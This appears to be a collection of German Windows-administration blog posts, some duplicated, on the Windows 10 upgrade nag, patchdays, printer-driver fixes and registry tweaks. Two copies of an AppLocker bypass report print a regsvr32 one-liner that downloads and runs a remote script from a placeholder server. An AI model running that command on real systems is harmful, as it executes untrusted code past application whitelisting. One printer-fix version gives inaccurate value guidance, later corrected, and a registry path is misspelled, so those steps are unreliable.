Seit Montag können Nutzer von Windows 7 und Windows 8.1 das kostenlose Upgrade auf das neue Windows 10 reservieren. Gleichzeitig hat Microsoft ein Update verteilt, welches alle entsprechenden Nutzer auf diese Möglichkeit mit einem Icon in der Taskleiste hinweist (siehe Screenshot).

Allerdings bleibt das Upgrade-Symbol dauerhaft im Tray eingeblendet, auch wenn eine Reservierung getätigt wurde. Nachfolgend zeige ich euch zwei Wege, wie ihr das nervige Tray-Icon wieder entfernen könnt.

Icon verstecken

Das Ausblenden des Upgrade-Symbols im System Tray sollte für die meisten Nutzer ausreichend sein. Dazu klickt man auf das „Pfeil nach oben”-Icon im System Tray links neben der Uhrzeit und wählt anschließend „Anpassen” aus. Im neu geöffneten Fenster muss der Eintrag „GWX” auf „Symbol und Benachrichtigungen ausblenden” gestellt werden. Fertig.

Update deinstallieren

Die zweite Möglichkeit ist das entsprechende Windows-Update KB3035583 zu deinstallieren, welches für den Upgrade-Hinweis verantwortlich ist. Die Deinstallation kann über „Windows Update” und „Installierte Updates” erfolgen. Nach der erfolgreichen Deinstallation muss das Update KB3035583 allerdings noch versteckt werden, da es ansonsten erneut auf dem System installiert wird.

Nach wie vor wirbt Microsoft unter Windows 7 und Windows 8.1 recht aufdringlich für das Upgrade auf Windows 10. Selbst wer den Upgrade-Hinweis bereits entfernt hatte, bekommt ihn mittlerweile wieder zu Gesicht. Das liegt daran, dass Microsoft das dafür verantwortliche Windows-Update KB3035583 in einer neuen Revision veröffentlicht hat. Darüber hinaus berichten einige Nutzer davon, dass die GWX-Applikation bei jedem Start bzw. bei jeder Aktivierung aus dem Standby-Modus abstürzt. Die Fehlermeldung muss dann jedes Mal geschlossen werden.

Beim jüngsten Patchday wurde das Upgrade auf Windows 10 sogar standardmäßig von der Windows-Update-Funktion zur Verfügung gestellt. Mittlerweile hat sich aber herausgestellt, dass dies laut Microsoft ein Fehler war und nur einen kleinen Teil der Nutzer von Windows 7 bzw. 8.1 betroffen hat.

Kurzum der Upgrade-Hinweis ist mehr als nervig und möchte von vielen Windows-Usern entfernt werden. Um diesen Weg etwas zu vereinfachen, biete ich ein Registry-Skript an, welches mit Administratorrechten ausgeführt werden muss.

Download Registry-Skript zum Blockieren vom Windows 10 Upgrade

Wer möchte kann die Änderungen in der Registry natürlich auch von Hand erledigen:

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\GWX]
"DisableGWX"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade]
"AllowOSUpgrade"=dword:00000000
"ReservationsAllowed"=dword:00000000

Nach einem Neustart sollte der störende Upgrade-Hinweis endgültig der Vergangenheit angehören. Falls doch nicht, könnt ihr alternativ auch das PowerShell-Skript von der c’t ausprobieren. Wenn auch das nichts hilft, bleibt euch wohl nichts anderes übrig als den Hinweis zu ertragen oder alternativ das Upgrade auf Windows 10 durchzuführen

Das Sicherheitsfeature AppLocker wurde mit Windows 7 eingeführt (nur bei Enterprise bzw. Ultimate vorhanden) und kommt hauptsächlich in Unternehmen zum Einsatz. AppLocker ermöglicht die Steuerung von Anwendungen, App-Paketen, DLLs und Skripten. Damit lassen sich beispielsweise bestimmte Programme auf Black- oder Whitelists setzen. In letzter Zeit wird AppLocker auch häufig gegen Malware und Ransomware eingesetzt, um ungewünschte Aktivitäten auf Systemen zu blockieren. Allerdings wurde jetzt eine Schwachstelle bekannt, wie sich die AppLocker-Ausführungsregeln relativ leicht umgehen lassen.

Der Sicherheitsforscher Casey Smith hat eine Schwachstelle entdeckt, wobei AppLocker mit Hilfe des Befehlszeilenprogramms “Regsvr32” (Microsoft Register Server) ausgehebelt werden kann. Regsvr32 wird üblicherweise zum Registrieren von DLL-Dateien verwendet, was im Normalfall allerdings Administratorrechte erfordert. Jetzt kommt der spannende Punkt: Wenn man dem Register Server eine JavaScript- oder VBScript-Datei übergibt, wird diese ohne weitere Nachfrage ausgeführt. Auch AppLocker greift hierbei nicht und es werden auch keine Administratorrechte angefordert.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Mit dieser Technik lassen sich auch Skripte über HTTP oder HTTPS nachladen, da Regsvr32 auch URLs akzeptiert. Da keine Änderungen an der Registry durchgeführt werden, ist ein Missbrauch auch relativ schwer zu erkennen. Bei Github existiert ein Proof of Concept mit einigen Beispiel-Skripten.

Microsoft wurde bereits über das Problem informiert, hat sich aber noch nicht zu Wort gemeldet. Bis dahin kann “regsvr32.exe” über die Windows Firewall blockiert werden, sodass zumindest eine Ausführung über das Netzwerk verhindert werden kann.

Am heutigen Patchday veröffentlicht Microsoft neun Security-Bulletins, von denen fünf als „kritisch“ und vier als „hoch“ eingestuft werden. Insgesamt sollen 34 Sicherheitslücken durch die Updates behoben werden. Neben den obligatorischen Updates für den Internet Explorer und Edge-Browser, stehen auch Updates für Office und Skype for Business bereit.

Nachfolgend ein grober Überblick der zur Verfügung stehenden sicherheitsrelevanten Updates. Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung.

Microsoft hat bekannt gegeben, dass es für Windows 7 und 8.1 zukünftig keine einzelnen Updates mehr, sondern nur noch kumulative Rollup-Pakete geben wird. Die Änderung soll ab Oktober 2016 Einzug halten und betrifft auch Windows Server 2008 R2, 2012 und 2012 R2.

Die kumulativen Rollup-Pakete werden ab Oktober eingeführt und werden ab diesem Zeitpunkt dann auch jeweils die Korrekturen der Vormonate enthalten. Längerfristig möchte Microsoft aber nach und nach auch alle bisher erschienenen Updates in die kumulativen Pakete integrieren. Für das .NET-Framework, Flash und den Internet Explorer sollen jeweils eigene Rollup-Pakete erscheinen. Durch den Einsatz von sogenannten “Express Packages” möchte Microsoft das Downloadvolumen für die Pakete klein halten. Dabei lädt der Windows-Client nur die tatsächlich benötigten Teile eines Update-Pakets herunter.

Neben den Rollup-Paketen, welche sowohl sicherheits- und nicht-sicherheitskritische Updates enthalten, wird Microsoft für Firmenkunden auch monatliche Sicherheits-Sammelpatches anbieten. Diese sind nicht kumulativ und enthalten alle Sicherheits-Updates für den jeweiligen Monat.

Durch diese Änderung möchte Microsoft die starke Fragmentierung von Windows 7 und 8.1 eindämmen und bestenfalls komplett beenden. Gleichzeitig möchte der Softwareriese damit die Anzahl der unterschiedlichen Systemkonfigurationen und potenziellen Fehlerquellen verringern. Ein Vorteil dabei ist, dass ein frisch installiertes Windows 7 oder 8.1 im besten Fall nur wenige Pakete installieren muss, um den aktuellen Patch-Stand zu erreichen. Allerdings bietet das Vorgehen von Microsoft auch einige Nachteile. Beispielsweise können problematische Patches dann nicht mehr wie bisher einzeln deinstalliert werden. Außerdem könnte Microsoft damit noch einfacher unerfreuliche funktionelle Änderungen verbreiten, Stichwort Telemetrie-Updates oder das GWX-Tool.

In größeren Firmennetzwerken mit vielen Clients wird oftmals von der Gruppenrichtlinieneinstellung Point-and-Print-Einschränkungen (Point and Print Restrictions) Gebrauch gemacht, um den Administrationsaufwand gering zu halten. Mit dieser Einstellung lässt sich steuern, wie Benutzer Druckertreiber von Druckerservern installieren können.

Seit einigen Wochen kommt es allerdings teilweise zu Problemen. Einige User berichten von einer Sicherheitsmeldung, wenn sie bestimmte Drucker verknüpfen bzw. installieren wollen. Die Meldung lautet “Vertrauen Sie diesem Drucker?”.

Ursache des Problems ist das Security-Bulletin MS16-087 aus dem Juli-Patchday. Genauer gesagt KB3170455 unter Windows 7 bzw. 8.1 und KB3163912 unter Windows 10 bzw. KB3172985 bei Windows 10 v1511. Nach der Deinstallation des entsprechenden Updates ist das Problem verschwunden und die Benutzer können ohne Warnmeldung Drucker installieren. Allerdings ist dieser Workaround nicht empfehlenswert und in vielen Netzwerken auch gar nicht möglich.

Auf der Suche nach einer sinnvollen Lösung bin ich auf den Thread “KB3163912 breaks Point and Print Restrictions GPO settings” im TechNet gestoßen. Hier berichten viele User von ähnlichen Problemen. Nach weiterer Fehlersuche war schnell klar, dass dieses Problem lediglich bei Druckern auftritt, die keine “packaged”-Treiber verwenden.

Einige haben sogar einen Case via Microsoft-Premiumsupport eröffnet. Die offizielle Antwort von Microsoft lautet, den Druckerhersteller zu kontaktieren und “packaged” Treiber zu verwenden. Leider existiert in einigen Fällen aber kein “packaged”-Treiber, was vor allem (aber nicht ausschließlich) ältere Drucker betrifft.

Lösung

Schlussendlich hat ein findiger User doch noch eine brauchbare Lösungsmöglichkeit vorgeschlagen. Mit Hilfe der Registry lässt sich ein “un-packaged”-Treiber in einen “packaged”-Treiber verwandeln. Dazu öffnet man den Registrierungseditor und navigiert zu folgendem Pfad:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Enviroments\Windowsx64\Drivers\...\

Dort angekommen wählt man links den betroffenen Druckertreiber aus, in meinem Beispiel den “Brother PCL5e Driver”.

Rechts muss der Wert “PrinterDriverAttributes” angepasst werden. Der aktuell gesetzte Wert muss um 1 erhöht werden. In meinem Fall muss er also von “0” auf “1” gesetzt werden. Danach muss noch der Druckdienst (Spooler) neugestartet werden. Ab diesem Zeitpunkt meldet sich der Treiber als “packaged” und kann ohne weiteren Benutzereingriff installiert werden.

Alternativ kann der betroffene Druckertreiber auch von Hand in einen “packaged”-Treiber umgewandelt werden. Hierzu reicht eine kleine Anpassung der INF-Datei aus. Bei Microsoft existieren weitere Informationen dazu. Vielleicht bekommen es damit auch einige Druckerhersteller gebacken, endlich “packaged”-Treber anzubieten.

Mit Windows 7 hat Microsoft das sogenannte „Aero Shake“ Feature eingeführt. Wird das aktuelle Fenster an der Titelleiste mit der linken Maustaste gepackt und geschüttelt, werden alle anderen Fenster minimiert. Das „geschüttelte“ Fenster bleibt sichtbar. Obwohl das Feature auf den ersten Blick ganz nützlich erscheint, kann es aber auch durch Versehen ausgelöst werden und ist in diesem Fall dann einfach nur störend.

Aus diesem Grund zeige ich euch, wie ihr Aero Shake ganz einfach deaktivieren könnt.

Möglichkeit 1: Editor für lokale Gruppenrichtlinien

1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und „gpedit.msc“ eingeben.
2. Unter „Benutzerkonfiguration“ zu „Administrative Vorlagen“ und „Desktop“ wechseln.
3. Im rechten Fensterbereich auf „Aero Shake-Mausbewegung zum Minimieren von Fenstern deaktivieren“ doppelklicken.
4. In dem neu geöffneten Fenster „Aktiviert“ auswählen und die Änderungen bestätigen.

Möglichkeit 2: Registrierungs-Editor

1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und „regedit“ eingeben, damit der Registrierungs-Editor geöffnet wird.
2. Anschließend zu folgendem Pfad navigieren:

   HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer

3. Darunter muss ein neuer „DWORD-Wert (32-Bit)“ mit dem Namen „NoWindowMinimizingShortcuts“ erstellt werden.
4. Dieser erhält den Wert auf „1„.
5. Nach einem Neustart sollten die Änderungen übernommen wer

Zur einfacheren Umsetzung biete ich eine Registrierungsdatei an, die alle Änderungen in der Registry automatisch durchführt.

Bei allen Windows-Systemen sammeln sich mit der Zeit viele Altlasten an, die nur Speicherplatz verbrauchen, aber eigentlich gar nicht mehr benötigt werden. So ist es auch mit den Dateien von alten Windows Updates. Diese befinden sich sogar an zwei unterschiedlichen Speicherorten, die bei älteren Windows-Installationen insgesamt mehrere Gigabyte ausmachen können. Der potenziell verfügbare freie Speicherplatz ist besonders bei alten Servern oder kleinen System-SSDs gern gesehen.

Nachfolgend zeige ich euch die beiden Möglichkeiten auf, wie ihr alle alten Update-Dateien unter Windows löschen könnt.

Alte Update-Dateien mit der Datenträgerbereinigung löschen

Nicht mehr benötigte Update-Dateien von bereits installierten Updates können ab Windows 8 bzw. Windows Server 2012 ganz einfach mit der Datenträgerbereinigung gelöscht werden. Bei Windows 7 bzw. Windows Server 2008 R2 ist dies jedoch erst mit dem Update KB2852386 möglich, welches im Oktober 2013 von Microsoft veröffentlicht wurde.

1. Die Datenträgerbereinigung starten. Am einfachsten funktioniert dies direkt über das Startmenü oder unter der „Systemsteuerung“ im Ordner „Verwaltung“.
   
2. Anschließend auf den Button „Systemdateien bereinigen“ klicken. Jetzt wird die Datenträgerbereinigung mit Administratorrechten neugestartet.
3. Zum Schluss den Haken bei „Windows Update-Bereinigung“ setzen und starten. Je nach Anzahl der Updates und Performance der Festplatte kann der Vorgang durchaus bis zu 30 Minuten dauern.
   

Temporäre Windows Update-Dateien löschen

Neben den nicht mehr benötigten Update-Dateien von bereits installierten Updates existiert noch ein zweiter Speicherort, in dem heruntergeladene Updates landen. Nach einer erfolgreichen Installation werden die Dateien nicht mehr benötigt. Hier können im Vergleich zur ersten Möglichkeit auch keine Probleme auftreten.

Daher können alle Dateien und Ordner unter folgendem Pfad gefahrlos gelöscht werden:

%WINDIR%\SoftwareDistribution\Download

Die zweite Möglichkeit liefert in der Regel deutlich weniger Speicherplatz als die erste, ist aber dafür umso schneller erledigt.

Bei aktivierter Benutzerkontensteuerung (UAC) kann es vorkommen, dass Netzwerklaufwerke in Programmen, die mit administrativen Rechten laufen, nicht angezeigt werden. Auch Microsoft beschreibt dieses Problem.

Ursache ist die Art und Weise, wie Windows mit aktivierter Benutzerkontensteuerung arbeitet. Wenn Netzlaufwerke per Anmeldeskript verbunden werden, erfolgt dies mit dem standardmäßigen Benutzer-Token, d.h. mit eingeschränkten Rechten. Programme, die mit administrativen Rechten laufen (nach Bestätigung des Benutzerkontensteuerung-Pop-Ups), arbeiten jedoch mit einem anderen Benutzer-Token. Dadurch sind Netzlaufwerke, welche mit dem eingeschränkten Benutzer-Token verbunden werden, nicht für das administrative Benutzer-Token vorhanden.

Dieses Verhalten lässt sich aber mittels eines kleinen Eingriffs in die Registry abstellen.

1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und “regedit” eingeben, damit der Registrierungs-Editor geöffnet wird.
2. Anschließend zu folgendem Pfad navigieren:

   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

3. Darunter muss ein neuer “DWORD-Wert (32-Bit)” mit dem Namen „EnableLinkedConnections“ erstellt werden.
4. Der Wert muss auf „1“ gesetzt werden.
5. Nach einem Neustart sind die Änderungen wirksam und Netzwerklaufwerke stehen auch im administrativen Kontext zur Verfügung.

Im Windows Explorer werden die Laufwerksbuchstaben standardmäßig hinter dem Namen der Laufwerke angezeigt. In einigen Fällen ist es aber sinnvoll den Laufwerksbuchstaben vor dem Namen anzeigen zu lassen, beispielsweise wenn viele Netzlaufwerke verwendet werden. Mit einer kleinen Änderung in der Registry lässt sich dies bewerkstelligen. Dieser Tipp funktioniert unter Windows 7, Windows 8 bzw. Windows 8.1 sowie Windows 10.

1. Den Registrierungs-Editor mit Administratorrechten starten. Am einfachsten funktioniert dies über die Suchfunktion.
2. Anschließend zu folgendem Pfad navigieren:

   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

3. Darunter muss ein neuer “DWORD-Wert (32-Bit)” mit dem Namen „ShowDriveLettersFirst“ erstellt werden.
4. Der Wert muss auf „4“ gesetzt werden. Wer die Laufwerksbuchstaben wieder nach dem Namen sehen möchte, kann den Wert auf „0“ setzen.
5. Nach einem Neustart bzw. nach dem Ab- und wieder Anmelden sind die Änderungen wirksam.

Zur einfacheren Umsetzung biete ich eine Registrierungsdatei an, die alle Änderungen in der Registry automatisch durchführt.

Seit Montag können Nutzer von Windows 7 und Windows 8.1 das kostenlose Upgrade auf das neue Windows 10 reservieren. Gleichzeitig hat Microsoft ein Update verteilt, welches alle entsprechenden Nutzer auf diese Möglichkeit mit einem Icon in der Taskleiste hinweist (siehe Screenshot).

Allerdings bleibt das Upgrade-Symbol dauerhaft im Tray eingeblendet, auch wenn eine Reservierung getätigt wurde. Nachfolgend zeige ich euch drei Wege, wie ihr das nervige Tray-Icon wieder entfernen könnt.

Registrierungs-Editor

Die zuverlässigste Möglichkeit zum entfernen des Upgrade-Hinweises auf Windows 10 verbirgt sich in der Registry.

1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und „regedit“ eingeben, damit der Registrierungs-Editor geöffnet wird.
2. Anschließend zu folgendem Pfad navigieren:

3. HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade

4. Falls die letzten beiden Schlüssel des Pfads nicht existieren ist das entsprechende Windows-Update noch nicht installiert. Die Schlüssel können dann einfach von Hand angelegt werden. Im Punkt 3 beschriebenen Pfad muss der Wert „ReservationsAllowed“ auf „0“ gesetzt werden.

(via)

Update deinstallieren

Die dritte Möglichkeit ist das entsprechende Windows-Update KB3035583 zu deinstallieren, welches für den Upgrade-Hinweis verantwortlich ist. Die Deinstallation kann über „Windows Update“ und „Installierte Updates“ erfolgen. Nach der erfolgreichen Deinstallation muss das Update KB3035583 allerdings noch versteckt werden, da es ansonsten erneut auf dem System installiert wird.

Icon verstecken

Das Ausblenden des Upgrade-Symbols im System Tray sollte für die meisten Nutzer ausreichend sein. Dazu klickt man auf das „Pfeil nach oben“-Icon im System Tray links neben der Uhrzeit und wählt anschließend „Anpassen“ aus. Im neu geöffneten Fenster muss der Eintrag „GWX“ auf „Symbol und Benachrichtigungen ausblenden“ gestellt werden. Fertig.

Nach wie vor wirbt Microsoft unter Windows 7 und Windows 8.1 recht aufdringlich für das Upgrade auf Windows 10. Selbst wer den Upgrade-Hinweis bereits entfernt hatte, bekommt ihn mittlerweile wieder zu Gesicht. Das liegt daran, dass Microsoft das dafür verantwortliche Windows-Update KB3035583 in einer neuen Revision veröffentlicht hat. Darüber hinaus berichten einige Nutzer davon, dass die GWX-Applikation bei jedem Start bzw. bei jeder Aktivierung aus dem Standby-Modus abstürzt. Die Fehlermeldung muss dann jedes Mal geschlossen werden.

Beim jüngsten Patchday wurde das Upgrade auf Windows 10 sogar standardmäßig von der Windows-Update-Funktion zur Verfügung gestellt. Mittlerweile hat sich aber herausgestellt, dass dies laut Microsoft ein Fehler war und nur einen kleinen Teil der Nutzer von Windows 7 bzw. 8.1 betroffen hat.

Kurzum der Upgrade-Hinweis ist mehr als nervig und möchte von vielen Windows-Usern entfernt werden. Um diesen Weg etwas zu vereinfachen, biete ich ein Registry-Skript an, welches mit Administratorrechten ausgeführt werden muss.

Download Registry-Skript zum Blockieren vom Windows 10 Upgrade

Wer möchte kann die Änderungen in der Registry natürlich auch von Hand erledigen:

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\GWX]
"DisableGWX"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade]
"AllowOSUpgrade"=dword:00000000
"ReservationsAllowed"=dword:00000000

Nach einem Neustart sollte der störende Upgrade-Hinweis endgültig der Vergangenheit angehören. Falls doch nicht, könnt ihr alternativ auch das PowerShell-Skript von der c’t ausprobieren. Wenn auch das nichts hilft, bleibt euch wohl nichts anderes übrig als den Hinweis zu ertragen oder alternativ das Upgrade auf Windows 10 durchzuführen

Das Sicherheitsfeature AppLocker wurde mit Windows 7 eingeführt (nur bei Enterprise bzw. Ultimate vorhanden) und kommt hauptsächlich in Unternehmen zum Einsatz. AppLocker ermöglicht die Steuerung von Anwendungen, App-Paketen, DLLs und Skripten. Damit lassen sich beispielsweise bestimmte Programme auf Black- oder Whitelists setzen. In letzter Zeit wird AppLocker auch häufig gegen Malware und Ransomware eingesetzt, um ungewünschte Aktivitäten auf Systemen zu blockieren. Allerdings wurde jetzt eine Schwachstelle bekannt, wie sich die AppLocker-Ausführungsregeln relativ leicht umgehen lassen.

Der Sicherheitsforscher Casey Smith hat eine Schwachstelle entdeckt, wobei AppLocker mit Hilfe des Befehlszeilenprogramms „Regsvr32“ (Microsoft Register Server) ausgehebelt werden kann. Regsvr32 wird üblicherweise zum Registrieren von DLL-Dateien verwendet, was im Normalfall allerdings Administratorrechte erfordert. Jetzt kommt der spannende Punkt: Wenn man dem Register Server eine JavaScript- oder VBScript-Datei übergibt, wird diese ohne weitere Nachfrage ausgeführt. Auch AppLocker greift hierbei nicht und es werden auch keine Administratorrechte angefordert.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Mit dieser Technik lassen sich auch Skripte über HTTP oder HTTPS nachladen, da Regsvr32 auch URLs akzeptiert. Da keine Änderungen an der Registry durchgeführt werden, ist ein Missbrauch auch relativ schwer zu erkennen. Bei Github existiert ein Proof of Concept mit einigen Beispiel-Skripten.

Microsoft wurde bereits über das Problem informiert, hat sich aber noch nicht zu Wort gemeldet. Bis dahin kann „regsvr32.exe“ über die Windows Firewall blockiert werden, sodass zumindest eine Ausführung über das Netzwerk verhindert werden kann.

Am heutigen Patchday veröffentlicht Microsoft neun Security-Bulletins, von denen fünf als „kritisch“ und vier als „hoch“ eingestuft werden. Insgesamt sollen 34 Sicherheitslücken durch die Updates behoben werden. Neben den obligatorischen Updates für den Internet Explorer und Edge-Browser, stehen auch Updates für Office und Skype for Business bereit.

Nachfolgend ein grober Überblick der zur Verfügung stehenden sicherheitsrelevanten Updates. Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung.

Microsoft hat bekannt gegeben, dass es für Windows 7 und 8.1 zukünftig keine einzelnen Updates mehr, sondern nur noch kumulative Rollup-Pakete geben wird. Die Änderung soll ab Oktober 2016 Einzug halten und betrifft auch Windows Server 2008 R2, 2012 und 2012 R2.

Die kumulativen Rollup-Pakete werden ab Oktober eingeführt und werden ab diesem Zeitpunkt dann auch jeweils die Korrekturen der Vormonate enthalten. Längerfristig möchte Microsoft aber nach und nach auch alle bisher erschienenen Updates in die kumulativen Pakete integrieren. Für das .NET-Framework, Flash und den Internet Explorer sollen jeweils eigene Rollup-Pakete erscheinen. Durch den Einsatz von sogenannten „Express Packages“ möchte Microsoft das Downloadvolumen für die Pakete klein halten. Dabei lädt der Windows-Client nur die tatsächlich benötigten Teile eines Update-Pakets herunter.

Neben den Rollup-Paketen, welche sowohl sicherheits- und nicht-sicherheitskritische Updates enthalten, wird Microsoft für Firmenkunden auch monatliche Sicherheits-Sammelpatches anbieten. Diese sind nicht kumulativ und enthalten alle Sicherheits-Updates für den jeweiligen Monat.

Durch diese Änderung möchte Microsoft die starke Fragmentierung von Windows 7 und 8.1 eindämmen und bestenfalls komplett beenden. Gleichzeitig möchte der Softwareriese damit die Anzahl der unterschiedlichen Systemkonfigurationen und potenziellen Fehlerquellen verringern. Ein Vorteil dabei ist, dass ein frisch installiertes Windows 7 oder 8.1 im besten Fall nur wenige Pakete installieren muss, um den aktuellen Patch-Stand zu erreichen. Allerdings bietet das Vorgehen von Microsoft auch einige Nachteile. Beispielsweise können problematische Patches dann nicht mehr wie bisher einzeln deinstalliert werden. Außerdem könnte Microsoft damit noch einfacher unerfreuliche funktionelle Änderungen verbreiten, Stichwort Telemetrie-Updates oder das GWX-Tool.

In größeren Firmennetzwerken mit vielen Clients wird oftmals von der Gruppenrichtlinieneinstellung Point-and-Print-Einschränkungen (Point and Print Restrictions) Gebrauch gemacht, um den Administrationsaufwand gering zu halten. Mit dieser Einstellung lässt sich steuern, wie Benutzer Druckertreiber von Druckerservern installieren können.

Seit einigen Wochen kommt es allerdings teilweise zu Problemen. Einige User berichten von einer Sicherheitsmeldung, wenn sie bestimmte Drucker verknüpfen bzw. installieren wollen. Die Meldung lautet „Vertrauen Sie diesem Drucker?“.

Ursache des Problems ist das Security-Bulletin MS16-087 aus dem Juli-Patchday. Genauer gesagt KB3170455 unter Windows 7 bzw. 8.1 und KB3163912 unter Windows 10 bzw. KB3172985 bei Windows 10 v1511. Nach der Deinstallation des entsprechenden Updates ist das Problem verschwunden und die Benutzer können ohne Warnmeldung Drucker installieren. Allerdings ist dieser Workaround nicht empfehlenswert und in vielen Netzwerken auch gar nicht möglich.

Auf der Suche nach einer sinnvollen Lösung bin ich auf den Thread „KB3163912 breaks Point and Print Restrictions GPO settings“ im TechNet gestoßen. Hier berichten viele User von ähnlichen Problemen. Nach weiterer Fehlersuche war schnell klar, dass dieses Problem lediglich bei Druckern auftritt, die keine „packaged“-Treiber verwenden.

Einige haben sogar einen Case via Microsoft-Premiumsupport eröffnet. Die offizielle Antwort von Microsoft lautet, den Druckerhersteller zu kontaktieren und „packaged“ Treiber zu verwenden. Leider existiert in einigen Fällen aber kein „packaged“-Treiber, was vor allem (aber nicht ausschließlich) ältere Drucker betrifft.

Lösung

Schlussendlich hat ein findiger User doch noch eine brauchbare Lösungsmöglichkeit vorgeschlagen. Mit Hilfe der Registry lässt sich ein „un-packaged“-Treiber in einen „packaged“-Treiber verwandeln. Dazu öffnet man den Registrierungseditor und navigiert zu folgendem Pfad:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Enviroments\Windowsx64\Drivers\...\

Dort angekommen wählt man links den betroffenen Druckertreiber aus, in meinem Beispiel den „Brother PCL5e Driver“.

Rechts muss der Wert „PrinterDriverAttributes“ angepasst werden. Das niedrigste Bit des Wertes ist für die Eigenschaft „Package Aware“ zuständig und muss entsprechend auf „1“ gesetzt werden. Der vorhandene Wert muss dabei ungerade gemacht werden, d.h. ein Wert von „0“ wird auf „1“ gesetzt, ein Wert von „2“ auf „3“ usw. Wenn der Wert beispielsweise „5“ ist dann passt er bereits und es muss nichts geändert werden. Danach muss noch der Druckdienst (Spooler) neugestartet werden. Ab diesem Zeitpunkt meldet sich der Treiber als „packaged“ und kann ohne weiteren Benutzereingriff installiert werden.

Alternativ kann der betroffene Druckertreiber auch von Hand in einen „packaged“-Treiber umgewandelt werden. Hierzu reicht eine kleine Anpassung der INF-Datei aus. Bei Microsoft existieren weitere Informationen dazu. Vielleicht bekommen es damit auch einige Druckerhersteller gebacken, endlich „packaged“-Treber anzubieten.

Seit geraumer Zeit beschweren sich Benutzer von Windows 7 und teilweise auch Windows 8.1, dass die Windows Update-Suche nicht mehr richtig funktioniert. Die Suche dauert extrem lange oder findet überhaupt keine Updates. In diesem Artikel möchte ich euch das Problem und die Ursache genauer erklären und selbstverständlich auch eine Lösung aufzeigen.

Problembeschreibung

Bei der Suche nach Windows Updates werden keine Updates gefunden oder sie dauert unheimliche lange. Windows zeigt lediglich den Hinweis an: „Es wird nach Updates gesucht…“. Teilweise vergehen viele Stunden, bis irgendetwas gefunden wird. Während der Suche sind gleichzeitig eine hohe CPU-Last (100 % auf einem Kern) und ein angestiegener RAM-Verbrauch durch „svchost.exe“ feststellbar.

Das Problem existiert seit Juli 2015 und tritt vor allem unter Windows 7 SP1 auf, wobei aber auch Nutzer von Windows 8.1 betroffen sind. Im Internet finden sich zahlreiche Foren-Threads mit entsprechenden Fragestellungen. Viele Nutzer sind verzweifelt und wissen nicht mehr weiter. Insbesondere nach einer Neuinstallation von Windows 7 tritt der Fehler häufiger auf.

Ursache

Oftmals liest man, dass eine langsame Internetverbindung oder die Microsoft-Server Ursache des Problems sein sollen. Dies ist definitiv nicht der Fall! Das Kernproblem der langsamen Windows Update-Suche ist vielmehr auf den komponentenbasierten Ansatz (CBS, Component-Based Servicing) mit .MSU-Paketen zurückzuführen. Kurz gesagt ist die Suche und Installation von Updates so komplex geworden, dass die Prüfung von bereits installierten Updates, von benötigten neuen Updates und von Abhängigkeiten einfach ewig dauert. Dadurch wird auch die oben beschriebene hohe CPU-Last erzeugt.

Eine ausführlichere Erklärung findet ihr bei Super User oder in der Microsoft Community (Beitrag von xp.client).

Lösung

Microsoft hat das Problem erkannt und hat ein Update für Windows Update veröffentlicht, welches das Problem in fast allen Fällen behebt. Folgendermaßen müsst ihr vorgehen.

1. Als Voraussetzung für die Installation des oben genannten Updates muss zuerst ein anderes Update (KB3020369) installiert werden.
2. Vor der Installation muss der „Windows Update“ Dienst beendet werden. Dies macht ihr am besten direkt über „Dienste“ oder alternativ über die Eingabeaufforderung und den Befehl „net stop wuauserv“.
3. Jetzt könnt ihr das „April 2015 servicing stack update“ KB3020369 herunterladen. Hier die Links für Windows 7 x64 und Windows 7 x86.
4. Update installieren und PC anschließend neu starten.
5. Jetzt folgt das oben erwähnte „Update für Windows Update“, welches Teil des „July 2016 update rollup“ KB3172605 ist. Hier ist der Link für Windows 7 x64 und hier für Windows 7 x86.
6. Der „Windows Update“ Dienst muss hierfür ein weiteres Mal beendet werden.
7. Update installieren und PC anschließend neu starten.
8. Jetzt könnt ihr manuell nach Updates suchen und nach spätestens einigen Minuten solltet ihr alle verfügbaren Updates für euer System sehen.

Ich hoffe euch hilft mein Artikel.

Nachdem der Februar-Patchday aus noch immer ungeklärten Gründen komplett ausgefallen ist, erscheinen an diesem März-Patchday mehr Updates als üblich. Insgesamt veröffentlicht Microsoft 18 Security-Bulletins, von denen neun als „kritisch“ und neun als „hoch“ eingestuft werden.

Es ist immer noch unklar, warum der letzte Patchday ausgefallen ist. Es kursieren zwar einige Gerüchte, aber keines konnte bisher bestätigt werden. Microsoft erklärte lediglich, dass in letzter Minute ein Problem gefunden wurde und nicht rechtzeitig gelöst werden konnte. Der Microsoft-Patchday existiert mittlerweile seit über 13 Jahren und ein vergleichbarer Fall ist bisher nie aufgetreten.

Nachfolgend ein kurzer Überblick über die erscheinenden Bulletins und die betroffenen Produkte. Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung.

Am heutigen Dienstag (zweiter Dienstag im Monat) startet der Microsoft-Patchday für den April 2017. Neben dem offiziellen Start für das Creators Update für Windows 10 (Version 1703), hat Microsoft außerdem eine Menge Updates freigegeben.

